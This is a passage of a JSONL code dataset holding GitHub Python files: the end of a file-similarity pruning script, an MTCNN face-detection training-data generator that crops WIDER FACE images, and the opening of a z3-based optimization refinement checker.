similarityThresh):\n \n \n \n # save the file name with the lower percentage\n if filePercent0 > filePercent1:\n relevantFiles.add(fileName1)\n\n # blacklist the other file\n blackList.add(fileName0)\n print(f'{fileName1} added')\n else:\n relevantFiles.add(fileName0)\n print(f'{fileName0} added')\n # black list the other file\n blackList.add(fileName1)\n\n else:\n # save both the file names\n relevantFiles.add(fileName1)\n relevantFiles.add(fileName0)\n print(f'both {fileName0} {fileName1}')\n\nprint(len(relevantFiles))\n\nfOut = open('testing.txt', 'w')\nfor name in relevantFiles:\n fOut.write(name)\n fOut.write('\\n')\n\nfOut.close()","repo_name":"rahulAgrBej/searchRepos_CS_Ed","sub_path":"similarLengthPrune.py","file_name":"similarLengthPrune.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71251615030","text":"import sys\nimport numpy as np\nimport cv2\nimport os\nfrom utils.tool import IoU,convert_to_square\nimport numpy.random as npr\nimport argparse\nfrom utils.detect import MtcnnDetector, create_mtcnn_net\nfrom utils.dataloader import ImageDB,TestImageLoader\nimport time\nfrom six.moves import cPickle\nimport utils.config as config\nimport utils.vision as vision\nsys.path.append(os.getcwd())\n\n\ntxt_from_path = './data_set/wider_face_train_bbx_gt.txt'\nanno_file = os.path.join(config.ANNO_STORE_DIR, 'anno_train.txt')\n# anno_file = './anno_store/anno_train.txt'\n\nprefix = ''\nuse_cuda = True\nim_dir = \"./data_set/face_detection/WIDER_train/images/\"\ntraindata_store = './data_set/train/'\nprefix_path = \"./data_set/face_detection/WIDER_train/images/\"\nannotation_file = './anno_store/anno_train.txt'\nprefix_path_lm = ''\nannotation_file_lm = \"./data_set/face_landmark/CNN_FacePoint/train/trainImageList.txt\"\n# ----------------------------------------------------other----------------------------------------------\npos_save_dir = \"./data_set/train/12/positive\"\npart_save_dir = \"./data_set/train/12/part\"\nneg_save_dir = './data_set/train/12/negative'\npnet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_12.txt')\npnet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_12.txt')\npnet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_12.txt')\nimglist_filename_pnet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_12.txt')\n# ----------------------------------------------------PNet----------------------------------------------\nrnet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_24.txt')\nrnet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_24.txt')\nrnet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_24.txt')\nrnet_landmark_file = os.path.join(config.ANNO_STORE_DIR, 'landmark_24.txt')\nimglist_filename_rnet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_24.txt')\n# ----------------------------------------------------RNet----------------------------------------------\nonet_postive_file = os.path.join(config.ANNO_STORE_DIR, 'pos_48.txt')\nonet_part_file = os.path.join(config.ANNO_STORE_DIR, 'part_48.txt')\nonet_neg_file = os.path.join(config.ANNO_STORE_DIR, 'neg_48.txt')\nonet_landmark_file = os.path.join(config.ANNO_STORE_DIR, 'landmark_48.txt')\nimglist_filename_onet = os.path.join(config.ANNO_STORE_DIR, 'imglist_anno_48.txt')\n# ----------------------------------------------------ONet----------------------------------------------\n\n\n\ndef assemble_data(output_file, anno_file_list=[]):\n\n #assemble the pos, neg, part annotations to one file\n size = 12\n\n if len(anno_file_list)==0:\n return 0\n\n if os.path.exists(output_file):\n os.remove(output_file)\n\n for anno_file in anno_file_list:\n with open(anno_file, 'r') as f:\n print(anno_file)\n anno_lines = f.readlines()\n\n base_num = 250000\n\n if len(anno_lines) > base_num * 3:\n idx_keep = npr.choice(len(anno_lines), size=base_num * 3, replace=True)\n elif len(anno_lines) > 100000:\n idx_keep = npr.choice(len(anno_lines), size=len(anno_lines), replace=True)\n else:\n idx_keep = np.arange(len(anno_lines))\n np.random.shuffle(idx_keep)\n chose_count = 0\n with open(output_file, 'a+') as f:\n for idx in idx_keep:\n # write lables of pos, neg, part images\n f.write(anno_lines[idx])\n chose_count+=1\n\n return chose_count\ndef wider_face(txt_from_path, txt_to_path):\n line_from_count = 0\n with open(txt_from_path, 'r') as f:\n annotations = f.readlines()\n with open(txt_to_path, 'w+') as f:\n while line_from_count < len(annotations):\n if annotations[line_from_count][2]=='-':\n img_name = annotations[line_from_count][:-1]\n line_from_count += 1 # change line to read the number\n bbox_count = int(annotations[line_from_count]) # num of bboxes\n line_from_count += 1 # change line to read the posession\n for _ in range(bbox_count):\n bbox = list(map(int,annotations[line_from_count].split()[:4])) # give a loop to append all the boxes\n bbox = [bbox[0], bbox[1], bbox[0]+bbox[2], bbox[1]+bbox[3]] # make x1, y1, w, h --> x1, y1, x2, y2\n bbox = list(map(str,bbox))\n img_name += (' '+' '.join(bbox))\n line_from_count+=1\n f.write(img_name +'\\n')\n else: # dectect the file name\n line_from_count+=1 \n\n# ----------------------------------------------------origin----------------------------------------------\ndef get_Pnet_data():\n if not os.path.exists(pos_save_dir):\n os.makedirs(pos_save_dir)\n if not os.path.exists(part_save_dir):\n os.makedirs(part_save_dir)\n if not os.path.exists(neg_save_dir):\n os.makedirs(neg_save_dir)\n f1 = open(os.path.join('./anno_store', 'pos_12.txt'), 'w')\n f2 = open(os.path.join('./anno_store', 'neg_12.txt'), 'w')\n f3 = open(os.path.join('./anno_store', 'part_12.txt'), 'w')\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n num = len(annotations)\n print(\"%d pics in total\" % num)\n p_idx = 0 # positive\n n_idx = 0 # negative\n d_idx = 0 # dont care\n idx = 0\n box_idx = 0\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n # annotation[0]文件名\n im_path = os.path.join(im_dir, annotation[0])\n # print(im_path)\n # print(os.path.exists(im_path))\n bbox = list(map(float, annotation[1:]))\n # annotation[1:]人脸坐标,一张脸4个值,对应两个点的坐标\n boxes = np.array(bbox, dtype=np.int32).reshape(-1, 4)\n # -1处的值为人脸数目\n if boxes.shape[0]==0:\n continue\n # 若无人脸则跳过本次循环\n img = cv2.imread(im_path)\n # print(img.shape)\n # exit()\n # 计数\n idx += 1\n if idx % 100 == 0:\n print(\"%s images done, pos: %s part: %s neg: %s\" % (idx, p_idx, d_idx, n_idx))\n\n # 图片三通道\n height, width, channel = img.shape\n\n neg_num = 0\n\n # 取50次不同的框\n while neg_num < 50:\n size = np.random.randint(12, min(width, height) / 2)\n nx = np.random.randint(0, width - size)\n ny = np.random.randint(0, height - size)\n crop_box = np.array([nx, ny, nx + size, ny + size])\n\n Iou = IoU(crop_box, boxes) # IoU为 重合部分 / 两框之和 ,越大越好\n\n cropped_im = img[ny: ny + size, nx: nx + size, :] # 裁去多余部分并resize成 12*12\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n neg_num += 1\n\n for box in boxes:\n # box (x_left, y_top, x_right, y_bottom)\n x1, y1, x2, y2 = box\n # w = x2 - x1 + 1\n # h = y2 - y1 + 1\n w = x2 - x1 + 1\n h = y2 - y1 + 1\n\n # ignore small faces\n # in case the ground truth boxes of small faces are not accurate\n if max(w, h) < 40 or x1 < 0 or y1 < 0:\n continue\n if w < 12 or h < 12:\n continue\n\n # generate negative examples that have overlap with gt\n for i in range(5):\n size = np.random.randint(12, min(width, height) / 2)\n\n # delta_x and delta_y are offsets of (x1, y1)\n delta_x = np.random.randint(max(-size, -x1), w)\n delta_y = np.random.randint(max(-size, -y1), h)\n nx1 = max(0, x1 + delta_x)\n ny1 = max(0, y1 + delta_y)\n\n if nx1 + size > width or ny1 + size > height:\n continue\n crop_box = np.array([nx1, ny1, nx1 + size, ny1 + size])\n Iou = IoU(crop_box, boxes)\n\n cropped_im = img[ny1: ny1 + size, nx1: nx1 + size, :]\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n\n # generate positive examples and part faces\n for i in range(20):\n size = np.random.randint(int(min(w, h) * 0.8), np.ceil(1.25 * max(w, h)))\n\n # delta here is the offset of box center\n delta_x = np.random.randint(-w * 0.2, w * 0.2)\n delta_y = np.random.randint(-h * 0.2, h * 0.2)\n\n nx1 = max(x1 + w / 2 + delta_x - size / 2, 0)\n ny1 = max(y1 + h / 2 + delta_y - size / 2, 0)\n nx2 = nx1 + size\n ny2 = ny1 + size\n\n if nx2 > width or ny2 > height:\n continue\n crop_box = np.array([nx1, ny1, nx2, ny2])\n\n offset_x1 = (x1 - nx1) / float(size)\n offset_y1 = (y1 - ny1) / float(size)\n offset_x2 = (x2 - nx2) / float(size)\n offset_y2 = (y2 - ny2) / float(size)\n\n cropped_im = img[int(ny1): int(ny2), int(nx1): int(nx2), :]\n resized_im = cv2.resize(cropped_im, (12, 12), interpolation=cv2.INTER_LINEAR)\n\n box_ = box.reshape(1, -1)\n if IoU(crop_box, box_) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n elif IoU(crop_box, box_) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n box_idx += 1\n #print(\"%s images done, pos: %s part: %s neg: %s\" % (idx, p_idx, d_idx, n_idx))\n\n f1.close()\n f2.close()\n f3.close()\n\n\ndef assembel_Pnet_data():\n anno_list = []\n\n anno_list.append(pnet_postive_file)\n anno_list.append(pnet_part_file)\n anno_list.append(pnet_neg_file)\n # anno_list.append(pnet_landmark_file)\n chose_count = assemble_data(imglist_filename_pnet ,anno_list)\n print(\"PNet train annotation result file path:%s\" % imglist_filename_pnet)\n\n# -----------------------------------------------------------------------------------------------------------------------------------------------#\n\ndef gen_rnet_data(data_dir, anno_file, pnet_model_file, prefix_path='', use_cuda=True, vis=False):\n\n \"\"\"\n :param data_dir: train data\n :param anno_file:\n :param pnet_model_file:\n :param prefix_path:\n :param use_cuda:\n :param vis:\n :return:\n \"\"\"\n\n # load trained pnet model\n \n pnet, _, _ = create_mtcnn_net(p_model_path = pnet_model_file, use_cuda = use_cuda)\n mtcnn_detector = MtcnnDetector(pnet = pnet, min_face_size = 12)\n\n # load original_anno_file, length = 12880\n imagedb = ImageDB(anno_file, mode = \"test\", prefix_path = prefix_path)\n imdb = imagedb.load_imdb()\n image_reader = TestImageLoader(imdb, 1, False)\n \n all_boxes = list()\n batch_idx = 0\n\n print('size:%d' %image_reader.size)\n for databatch in image_reader:\n if batch_idx % 100 == 0:\n print (\"%d images done\" % batch_idx)\n im = databatch\n t = time.time()\n\n # obtain boxes and aligned boxes\n boxes, boxes_align = mtcnn_detector.detect_pnet(im=im)\n if boxes_align is None:\n all_boxes.append(np.array([]))\n batch_idx += 1\n continue\n if vis:\n rgb_im = cv2.cvtColor(np.asarray(im), cv2.COLOR_BGR2RGB)\n vision.vis_two(rgb_im, boxes, boxes_align)\n\n t1 = time.time() - t\n print('cost time ',t1)\n t = time.time()\n all_boxes.append(boxes_align)\n batch_idx += 1\n # if batch_idx == 100:\n # break\n # print(\"shape of all boxes {0}\".format(all_boxes))\n # time.sleep(5)\n\n # save_path = model_store_path()\n # './model_store'\n save_path = './model_store'\n\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n save_file = os.path.join(save_path, \"detections_%d.pkl\" % int(time.time()))\n with open(save_file, 'wb') as f:\n cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL)\n\n # save_file = './model_store/detections_1588751332.pkl'\n gen_rnet_sample_data(data_dir, anno_file, save_file, prefix_path)\n\n\n\ndef gen_rnet_sample_data(data_dir, anno_file, det_boxs_file, prefix_path):\n\n \"\"\"\n :param data_dir:\n :param anno_file: original annotations file of wider face data\n :param det_boxs_file: detection boxes file\n :param prefix_path:\n :return:\n \"\"\"\n\n neg_save_dir = os.path.join(data_dir, \"24/negative\")\n pos_save_dir = os.path.join(data_dir, \"24/positive\")\n part_save_dir = os.path.join(data_dir, \"24/part\")\n\n\n for dir_path in [neg_save_dir, pos_save_dir, part_save_dir]:\n # print(dir_path)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\n # load ground truth from annotation file\n # format of each line: image/path [x1,y1,x2,y2] for each gt_box in this image\n\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n\n image_size = 24\n net = \"rnet\"\n\n im_idx_list = list()\n gt_boxes_list = list()\n num_of_images = len(annotations)\n print (\"processing %d images in total\" % num_of_images)\n\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n im_idx = os.path.join(prefix_path, annotation[0])\n # im_idx = annotation[0]\n\n boxes = list(map(float, annotation[1:]))\n boxes = np.array(boxes, dtype=np.float32).reshape(-1, 4)\n im_idx_list.append(im_idx)\n gt_boxes_list.append(boxes)\n\n\n # './anno_store'\n save_path = './anno_store'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n f1 = open(os.path.join(save_path, 'pos_%d.txt' % image_size), 'w')\n f2 = open(os.path.join(save_path, 'neg_%d.txt' % image_size), 'w')\n f3 = open(os.path.join(save_path, 'part_%d.txt' % image_size), 'w')\n\n # print(det_boxs_file)\n det_handle = open(det_boxs_file, 'rb')\n\n det_boxes = cPickle.load(det_handle)\n\n # an image contain many boxes stored in an array\n print(len(det_boxes), num_of_images)\n # assert len(det_boxes) == num_of_images, \"incorrect detections or ground truths\"\n\n # index of neg, pos and part face, used as their image names\n n_idx = 0\n p_idx = 0\n d_idx = 0\n image_done = 0\n for im_idx, dets, gts in zip(im_idx_list, det_boxes, gt_boxes_list):\n\n # if (im_idx+1) == 100:\n # break\n\n gts = np.array(gts, dtype=np.float32).reshape(-1, 4)\n if gts.shape[0]==0:\n continue\n if image_done % 100 == 0:\n print(\"%d images done\" % image_done)\n image_done += 1\n\n if dets.shape[0] == 0:\n continue\n img = cv2.imread(im_idx)\n # change to square\n dets = convert_to_square(dets)\n dets[:, 0:4] = np.round(dets[:, 0:4])\n neg_num = 0\n for box in dets:\n x_left, y_top, x_right, y_bottom, _ = box.astype(int)\n width = x_right - x_left + 1\n height = y_bottom - y_top + 1\n\n # ignore box that is too small or beyond image border\n if width < 20 or x_left < 0 or y_top < 0 or x_right > img.shape[1] - 1 or y_bottom > img.shape[0] - 1:\n continue\n\n # compute intersection over union(IoU) between current box and all gt boxes\n Iou = IoU(box, gts)\n cropped_im = img[y_top:y_bottom + 1, x_left:x_right + 1, :]\n resized_im = cv2.resize(cropped_im, (image_size, image_size),\n interpolation=cv2.INTER_LINEAR)\n\n # save negative images and write label\n # Iou with all gts must below 0.3\n if np.max(Iou) < 0.3 and neg_num < 60:\n # save the examples\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n # print(save_file)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n neg_num += 1\n else:\n # find gt_box with the highest iou\n idx = np.argmax(Iou)\n assigned_gt = gts[idx]\n x1, y1, x2, y2 = assigned_gt\n\n # compute bbox reg label\n offset_x1 = (x1 - x_left) / float(width)\n offset_y1 = (y1 - y_top) / float(height)\n offset_x2 = (x2 - x_right) / float(width)\n offset_y2 = (y2 - y_bottom) / float(height)\n\n # save positive and part-face images and write labels\n if np.max(Iou) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n\n elif np.max(Iou) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n f1.close()\n f2.close()\n f3.close()\n\ndef model_store_path():\n return os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))+\"/model_store\"\n\ndef get_Rnet_data(pnet_model):\n gen_rnet_data(traindata_store, annotation_file, pnet_model_file = pnet_model, prefix_path = prefix_path, use_cuda = True)\n\n\ndef assembel_Rnet_data():\n anno_list = []\n\n anno_list.append(rnet_postive_file)\n anno_list.append(rnet_part_file)\n anno_list.append(rnet_neg_file)\n # anno_list.append(pnet_landmark_file)\n\n chose_count = assemble_data(imglist_filename_rnet ,anno_list)\n print(\"RNet train annotation result file path:%s\" % imglist_filename_rnet)\n#-----------------------------------------------------------------------------------------------------------------------------------------------#\ndef gen_onet_data(data_dir, anno_file, pnet_model_file, rnet_model_file, prefix_path='', use_cuda=True, vis=False):\n\n\n pnet, rnet, _ = create_mtcnn_net(p_model_path=pnet_model_file, r_model_path=rnet_model_file, use_cuda=use_cuda)\n mtcnn_detector = MtcnnDetector(pnet=pnet, rnet=rnet, min_face_size=12)\n\n imagedb = ImageDB(anno_file,mode=\"test\",prefix_path=prefix_path)\n imdb = imagedb.load_imdb()\n image_reader = TestImageLoader(imdb,1,False)\n\n all_boxes = list()\n batch_idx = 0\n\n print('size:%d' % image_reader.size)\n for databatch in image_reader:\n if batch_idx % 50 == 0:\n print(\"%d images done\" % batch_idx)\n\n im = databatch\n\n t = time.time()\n\n # pnet detection = [x1, y1, x2, y2, score, reg]\n p_boxes, p_boxes_align = mtcnn_detector.detect_pnet(im=im)\n\n t0 = time.time() - t\n t = time.time()\n # rnet detection\n boxes, boxes_align = mtcnn_detector.detect_rnet(im=im, dets=p_boxes_align)\n\n t1 = time.time() - t\n print('cost time pnet--',t0,' rnet--',t1)\n t = time.time()\n\n if boxes_align is None:\n all_boxes.append(np.array([]))\n batch_idx += 1\n continue\n if vis:\n rgb_im = cv2.cvtColor(np.asarray(im), cv2.COLOR_BGR2RGB)\n vision.vis_two(rgb_im, boxes, boxes_align)\n\n \n all_boxes.append(boxes_align)\n batch_idx += 1\n\n save_path = './model_store'\n\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n save_file = os.path.join(save_path, \"detections_%d.pkl\" % int(time.time()))\n with open(save_file, 'wb') as f:\n cPickle.dump(all_boxes, f, cPickle.HIGHEST_PROTOCOL)\n\n\n gen_onet_sample_data(data_dir,anno_file,save_file,prefix_path)\n\n\n\ndef gen_onet_sample_data(data_dir,anno_file,det_boxs_file,prefix):\n\n neg_save_dir = os.path.join(data_dir, \"48/negative\")\n pos_save_dir = os.path.join(data_dir, \"48/positive\")\n part_save_dir = os.path.join(data_dir, \"48/part\")\n\n for dir_path in [neg_save_dir, pos_save_dir, part_save_dir]:\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\n # load ground truth from annotation file\n # format of each line: image/path [x1,y1,x2,y2] for each gt_box in this image\n\n with open(anno_file, 'r') as f:\n annotations = f.readlines()\n\n image_size = 48\n net = \"onet\"\n\n im_idx_list = list()\n gt_boxes_list = list()\n num_of_images = len(annotations)\n print(\"processing %d images in total\" % num_of_images)\n\n for annotation in annotations:\n annotation = annotation.strip().split(' ')\n im_idx = os.path.join(prefix,annotation[0])\n\n boxes = list(map(float, annotation[1:]))\n boxes = np.array(boxes, dtype=np.float32).reshape(-1, 4)\n im_idx_list.append(im_idx)\n gt_boxes_list.append(boxes)\n\n save_path = './anno_store'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n f1 = open(os.path.join(save_path, 'pos_%d.txt' % image_size), 'w')\n f2 = open(os.path.join(save_path, 'neg_%d.txt' % image_size), 'w')\n f3 = open(os.path.join(save_path, 'part_%d.txt' % image_size), 'w')\n\n det_handle = open(det_boxs_file, 'rb')\n\n det_boxes = cPickle.load(det_handle)\n print(len(det_boxes), num_of_images)\n # assert len(det_boxes) == num_of_images, \"incorrect detections or ground truths\"\n\n # index of neg, pos and part face, used as their image names\n n_idx = 0\n p_idx = 0\n d_idx = 0\n image_done = 0\n for im_idx, dets, gts in zip(im_idx_list, det_boxes, gt_boxes_list):\n if image_done % 100 == 0:\n print(\"%d images done\" % image_done)\n image_done += 1\n if gts.shape[0]==0:\n continue\n if dets.shape[0] == 0:\n continue\n img = cv2.imread(im_idx)\n dets = convert_to_square(dets)\n dets[:, 0:4] = np.round(dets[:, 0:4])\n\n for box in dets:\n x_left, y_top, x_right, y_bottom = box[0:4].astype(int)\n width = x_right - x_left + 1\n height = y_bottom - y_top + 1\n\n # ignore box that is too small or beyond image border\n if width < 20 or x_left < 0 or y_top < 0 or x_right > img.shape[1] - 1 or y_bottom > img.shape[0] - 1:\n continue\n\n # compute intersection over union(IoU) between current box and all gt boxes\n Iou = IoU(box, gts)\n cropped_im = img[y_top:y_bottom + 1, x_left:x_right + 1, :]\n resized_im = cv2.resize(cropped_im, (image_size, image_size),\n interpolation=cv2.INTER_LINEAR)\n\n # save negative images and write label\n if np.max(Iou) < 0.3:\n # Iou with all gts must below 0.3\n save_file = os.path.join(neg_save_dir, \"%s.jpg\" % n_idx)\n f2.write(save_file + ' 0\\n')\n cv2.imwrite(save_file, resized_im)\n n_idx += 1\n else:\n # find gt_box with the highest iou\n idx = np.argmax(Iou)\n assigned_gt = gts[idx]\n x1, y1, x2, y2 = assigned_gt\n\n # compute bbox reg label\n offset_x1 = (x1 - x_left) / float(width)\n offset_y1 = (y1 - y_top) / float(height)\n offset_x2 = (x2 - x_right) / float(width)\n offset_y2 = (y2 - y_bottom) / float(height)\n\n # save positive and part-face images and write labels\n if np.max(Iou) >= 0.65:\n save_file = os.path.join(pos_save_dir, \"%s.jpg\" % p_idx)\n f1.write(save_file + ' 1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n p_idx += 1\n\n elif np.max(Iou) >= 0.4:\n save_file = os.path.join(part_save_dir, \"%s.jpg\" % d_idx)\n f3.write(save_file + ' -1 %.2f %.2f %.2f %.2f\\n' % (\n offset_x1, offset_y1, offset_x2, offset_y2))\n cv2.imwrite(save_file, resized_im)\n d_idx += 1\n f1.close()\n f2.close()\n f3.close()\n\n\n\ndef model_store_path():\n return os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))+\"/model_store\"\n\n\ndef get_Onet_data(pnet_model, rnet_model):\n gen_onet_data(traindata_store, annotation_file, pnet_model_file = pnet_model, rnet_model_file = rnet_model,prefix_path=prefix_path,use_cuda = True, vis = False)\n\n\ndef assembel_Onet_data():\n anno_list = []\n\n anno_list.append(onet_postive_file)\n anno_list.append(onet_part_file)\n anno_list.append(onet_neg_file)\n anno_list.append(onet_landmark_file)\n\n chose_count = assemble_data(imglist_filename_onet ,anno_list)\n print(\"ONet train annotation result file path:%s\" % imglist_filename_onet)\n\n\ndef gen_landmark_48(anno_file, data_dir, prefix = ''):\n\n\n size = 48\n image_id = 0\n\n landmark_imgs_save_dir = os.path.join(data_dir,\"48/landmark\")\n if not os.path.exists(landmark_imgs_save_dir):\n os.makedirs(landmark_imgs_save_dir)\n\n anno_dir = './anno_store'\n if not os.path.exists(anno_dir):\n os.makedirs(anno_dir)\n\n landmark_anno_filename = \"landmark_48.txt\"\n save_landmark_anno = os.path.join(anno_dir,landmark_anno_filename)\n\n # print(save_landmark_anno)\n # time.sleep(5)\n f = open(save_landmark_anno, 'w')\n # dstdir = \"train_landmark_few\"\n\n with open(anno_file, 'r') as f2:\n annotations = f2.readlines()\n\n num = len(annotations)\n print(\"%d total images\" % num)\n\n l_idx =0\n idx = 0\n # image_path bbox landmark(5*2)\n for annotation in annotations:\n # print imgPath\n\n annotation = annotation.strip().split(' ')\n\n assert len(annotation)==15,\"each line should have 15 element\"\n\n im_path = os.path.join('./data_set/face_landmark/CNN_FacePoint/train/',annotation[0].replace(\"\\\\\", \"/\"))\n\n gt_box = list(map(float, annotation[1:5]))\n # gt_box = [gt_box[0], gt_box[2], gt_box[1], gt_box[3]]\n\n\n gt_box = np.array(gt_box, dtype=np.int32)\n\n landmark = list(map(float, annotation[5:]))\n landmark = np.array(landmark, dtype=np.float)\n\n img = cv2.imread(im_path)\n # print(im_path)\n assert (img is not None)\n\n height, width, channel = img.shape\n # crop_face = img[gt_box[1]:gt_box[3]+1, gt_box[0]:gt_box[2]+1]\n # crop_face = cv2.resize(crop_face,(size,size))\n\n idx = idx + 1\n if idx % 100 == 0:\n print(\"%d images done, landmark images: %d\"%(idx,l_idx))\n # print(im_path)\n # print(gt_box)\n x1, x2, y1, y2 = gt_box\n gt_box[1] = y1\n gt_box[2] = x2\n # time.sleep(5)\n\n # gt's width\n w = x2 - x1 + 1\n # gt's height\n h = y2 - y1 + 1\n if max(w, h) < 40 or x1 < 0 or y1 < 0:\n continue\n # random shift\n for i in range(10):\n bbox_size = np.random.randint(int(min(w, h) * 0.8), np.ceil(1.25 * max(w, h)))\n delta_x = np.random.randint(-w * 0.2, w * 0.2)\n delta_y = np.random.randint(-h * 0.2, h * 0.2)\n nx1 = max(x1 + w / 2 - bbox_size / 2 + delta_x, 0)\n ny1 = max(y1 + h / 2 - bbox_size / 2 + delta_y, 0)\n\n nx2 = nx1 + bbox_size\n ny2 = ny1 + bbox_size\n if nx2 > width or ny2 > height:\n continue\n crop_box = np.array([nx1, ny1, nx2, ny2])\n cropped_im = img[int(ny1):int(ny2) + 1, int(nx1):int(nx2) + 1, :]\n resized_im = cv2.resize(cropped_im, (size, size),interpolation=cv2.INTER_LINEAR)\n\n offset_x1 = (x1 - nx1) / float(bbox_size)\n offset_y1 = (y1 - ny1) / float(bbox_size)\n offset_x2 = (x2 - nx2) / float(bbox_size)\n offset_y2 = (y2 - ny2) / float(bbox_size)\n\n offset_left_eye_x = (landmark[0] - nx1) / float(bbox_size)\n offset_left_eye_y = (landmark[1] - ny1) / float(bbox_size)\n\n offset_right_eye_x = (landmark[2] - nx1) / float(bbox_size)\n offset_right_eye_y = (landmark[3] - ny1) / float(bbox_size)\n\n offset_nose_x = (landmark[4] - nx1) / float(bbox_size)\n offset_nose_y = (landmark[5] - ny1) / float(bbox_size)\n\n offset_left_mouth_x = (landmark[6] - nx1) / float(bbox_size)\n offset_left_mouth_y = (landmark[7] - ny1) / float(bbox_size)\n\n offset_right_mouth_x = (landmark[8] - nx1) / float(bbox_size)\n offset_right_mouth_y = (landmark[9] - ny1) / float(bbox_size)\n\n\n # cal iou\n iou = IoU(crop_box.astype(np.float), np.expand_dims(gt_box.astype(np.float), 0))\n # print(iou)\n if iou > 0.65:\n save_file = os.path.join(landmark_imgs_save_dir, \"%s.jpg\" % l_idx)\n cv2.imwrite(save_file, resized_im)\n\n f.write(save_file + ' -2 %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f \\n' % \\\n (offset_x1, offset_y1, offset_x2, offset_y2, \\\n offset_left_eye_x,offset_left_eye_y,offset_right_eye_x,offset_right_eye_y,offset_nose_x,offset_nose_y,offset_left_mouth_x,offset_left_mouth_y,offset_right_mouth_x,offset_right_mouth_y))\n # print(save_file)\n # print(save_landmark_anno)\n l_idx += 1\n\n f.close()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Get data',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--net', dest='net', help='which net to show', type=str)\n parser.add_argument('--pnet_path', default=\"./model_store/pnet_epoch_20.pt\",help='path to pnet model', type=str)\n parser.add_argument('--rnet_path', default=\"./model_store/rnet_epoch_20.pt\",help='path to rnet model', type=str)\n parser.add_argument('--use_cuda', default=True,help='use cuda', type=bool)\n\n args = parser.parse_args()\n return args\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------#\nif __name__ == '__main__':\n args = parse_args()\n dir = 'anno_store'\n if not os.path.exists(dir):\n os.makedirs(dir)\n if args.net == \"pnet\":\n wider_face(txt_from_path, anno_file)\n get_Pnet_data()\n assembel_Pnet_data()\n elif args.net == \"rnet\":\n get_Rnet_data(args.pnet_path)\n assembel_Rnet_data()\n elif args.net == \"onet\":\n get_Onet_data(args.pnet_path, args.rnet_path)\n gen_landmark_48(annotation_file_lm, traindata_store, prefix_path_lm)\n assembel_Onet_data()","repo_name":"Enderfga/mtCNN_sysu","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":32179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"20910424236","text":"'''\nRefinement checking for optimizations.\n'''\n\nfrom . import config\nfrom . import error\nfrom . import smtinterp\nimport z3\nimport glob\nimport logging\nimport time\nfrom .language import *\nfrom .z3util import mk_and, mk_not, mk_forall\n\nlogger = logging.getLogger(__name__)\n\nPRESAFE, TGTSAFE, UB, POISON, UNEQUAL = range(5)\n\ndef check(opt, type_model, encoding=config.encoding, assume_inhabited=False):\n \"\"\"Check that opt is a refinement for the given type_model.\n Raises Error if the opt is not a refinement. Returns false if opt\n is trivial (that is, the precondition cannot be satisfied. Otherwise,\n returns true.\n\n Keywords:\n encoding: specify an encoding using a string or SMTEncoder class\n assume_inhabited: if true, do not check whether the precondition is satisfied.\n 